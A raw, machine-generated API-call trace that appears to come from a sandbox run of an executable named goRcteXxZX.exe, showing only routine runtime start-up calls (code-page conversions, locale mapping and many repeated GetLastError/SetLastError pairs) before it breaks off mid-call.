!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.316] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x14f8c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿþk\x80õüú\x14", lpUsedDefaultChar=0x0) returned 256 [0032.316] GetLastError () returned 0x0 [0032.316] SetLastError (dwErrCode=0x0) [0032.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f9c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.316] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f9c4, cbMultiByte=256, lpWideCharStr=0x14f318, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ充矲狰Ā") returned 256 [0032.316] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ充矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.316] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ充矲狰Ā", cchSrc=256, lpDestStr=0x14f108, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.316] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x14f7c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿþk\x80õüú\x14", lpUsedDefaultChar=0x0) returned 256 [0032.316] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.317] SetLastError (dwErrCode=0x0) [0032.317] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.318] SetLastError (dwErrCode=0x0) [0032.318] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.319] SetLastError (dwErrCode=0x0) [0032.319] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.320] SetLastError (dwErrCode=0x0) [0032.320] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.321] SetLastError (dwErrCode=0x0) [0032.321] GetLastError () returned 0x0 [0032.322] SetLastError (dwErrCode=0x0) [0032.322] GetLastError () returned 0x0 [0032.322] SetLastError (dwErrCode=0x0) [0032.322] GetLastError () returned 0x0 [0032.322] SetLastError (dwErrCode=0x0) [0032.322] GetLastError () returned 0x0 [0032.322] SetLastError (dwErrCode=0x0) [0032.322] GetLastError () returned 0x0 [0032.322] SetLastError (dwErrCode=0x0) [0032.322] GetLastError () returned 0x0 [0032.322] SetLastError (dwErrCode=0x0) [0032.322] GetLastError () returned 0x0 [0032.322] SetLastError (dwErrCode=0x0) [0032.322] GetLastError () returned 0x0 [0032.322] SetLastError (dwErrCode=0x0) [0032.322] GetLastError () returned 0x0 [0032.322] SetLastError (dwErrCode=0x0) [0032.322] GetLastError () returned 0x0 [0032.329] SetLastError (dwErrCode=0x0) [0032.329] GetLastError () returned 0x0 [0032.329] SetLastError (dwErrCode=0x0) [0032.329] GetLastError () returned 0x0 [0032.329] SetLastError (dwErrCode=0x0) [0032.329] GetLastError () returned 0x0 [0032.329] SetLastError (dwErrCode=0x0) [0032.329] GetLastError () returned 0x0 [0032.329] SetLastError (dwErrCode=0x0) [0032.329] GetLastError () returned 0x0 [0032.329] SetLastError (dwErrCode=0x0) [0032.329] GetLastError () returned 0x0 [0032.329] SetLastError (dwErrCode=0x0) [0032.329] GetLastError () returned 0x0 [0032.329] SetLastError (dwErrCode=0x0) [0032.329] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.330] SetLastError (dwErrCode=0x0) [0032.330] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.331] SetLastError (dwErrCode=0x0) [0032.331] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.332] SetLastError (dwErrCode=0x0) [0032.332] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.333] SetLastError (dwErrCode=0x0) [0032.333] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.334] SetLastError (dwErrCode=0x0) [0032.334] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.335] SetLastError (dwErrCode=0x0) [0032.335] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.336] SetLastError (dwErrCode=0x0) [0032.336] GetLastError () returned 0x0 [0032.337] SetLastError (dwErrCode=0x0) [0032.337] GetLastError () returned 0x0 [0032.337] SetLastError (dwErrCode=0x0) [0032.337] GetLastError () returned 0x0 [0032.337] SetLastError (dwErrCode=0x0) [0032.337] GetLastError () returned 0x0 [0032.337] SetLastError (dwErrCode=0x0) [0032.337] GetLastError () returned 0x0 [0032.337] SetLastError (dwErrCode=0x0) [0032.337] GetLastError () returned 0x0 [0032.337] SetLastError (dwErrCode=0x0) [0032.337] GetLastError () returned 0x0 [0032.337] SetLastError (dwErrCode=0x0) [0032.338] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.338] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.338] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.339] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fb40 | out: lpSystemTimeAsFileTime=0x14fb40*(dwLowDateTime=0xe1009050, dwHighDateTime=0x1d3dfba)) [0032.339] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14fa78, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.339] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14f960, nSize=0x104 | out: 